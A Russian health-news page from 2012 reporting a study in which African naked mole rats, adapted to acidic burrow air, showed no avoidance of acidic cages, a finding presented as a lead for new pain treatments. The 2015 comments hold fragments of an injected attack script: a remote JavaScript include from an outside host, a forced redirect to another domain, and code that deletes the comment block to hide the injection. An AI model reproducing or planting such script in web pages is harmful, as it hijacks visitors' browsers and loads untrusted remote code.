Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Голые крысы спасут людей ...  >>  Голые крысы спасут людей от боли
 
Обратная связь
 

Голые крысы спасут людей от боли

Размер шрифта
30 октября 2012 00:00
Юрий Малышев
Здоровье инфо
Анна Белевская
Здоровье инфо
  • google_analytics: false
  • Нравится

Африканские голые крысы помогут ученым справиться с болью у человека.

голые крысы спасут от боли

История вопроса

В норах, где живут африканские голые крысы, находится большое количество углекислого газа, в результате чего воздух приобретает кислую реакцию. Голые крысы адаптировались к такой среде, тогда как для других млекопитающих подобная концентрация углекислого газа токсична.

Именно кислая среда поврежденной ткани приводит к появлению длительной боли после травмы. Поэтому ученые решили, что голые крысы, которым удалось адаптироваться к кислой среде и которые при нахождении в такой среде не испытывают боль, смогут подсказать новые способы устранения боли у людей.

Суть исследования

В носу млекопитающих находятся специальные нервные волокна, которые активируются под воздействием кислой среды воздуха. Электрические сигналы поступают в головной мозг, который распознает опасность и защищает животное от воздействия кислой среды. В организме животного происходят физиологические изменения (выработка слизи в носу), а также наблюдается изменение поведения (животное пытается покинуть опасное место).

Ученые поместили голых крыс в систему клеток, в некоторых из которых воздух имел кислую реакцию. Животные могли свободно перемещаться по клеткам, а ученые фиксировали время пребывания в каждой клетке. Поведение голых крыс сравнивали с поведением лабораторных крыс и мышей, которые предпочитают более комфортные условия проживания.

Результаты

Сопоставив полученные результаты, ученые обнаружили, что голые крысы половину времени, отведенного на эксперимент, проводили в клетках с кислой реакцией воздуха, в то время как лабораторные животные избегали этих клеток. Кроме того, ученые определяли уровень специального белка, которые является непрямым маркером активности участка головного мозга, защищающего животных от воздействия кислой среды. Активность наблюдалась только у лабораторных животных, тогда как у голых крыс, которые привыкли жить в кислой среде, активности не было.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 21:25

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 23:33

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Хотите не чувствовать боли – спите дольше   7 сигналов, которые нельзя игнорировать   Как избавиться от боли без лекарств   Самые страшные боли на свете  
29 октября 2012Голые крысы спасут людей от боли 30 января 2013Хотите не чувствовать боли – спите дольше
 
21 ноября 2012Змеиный яд обезболивает как морфин 02 апреля 2013Революция в лечении головной боли
 

Слайдшоу

1
5 упражнений против боли
4 боли, которые нельзя игнорировать
7 смертельных симптомов, которые нельзя пропускать

Тесты

1
Рискуете ли вы заболеть остеохондрозом?
Грипп или простуда?
Как облегчить менопаузу?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.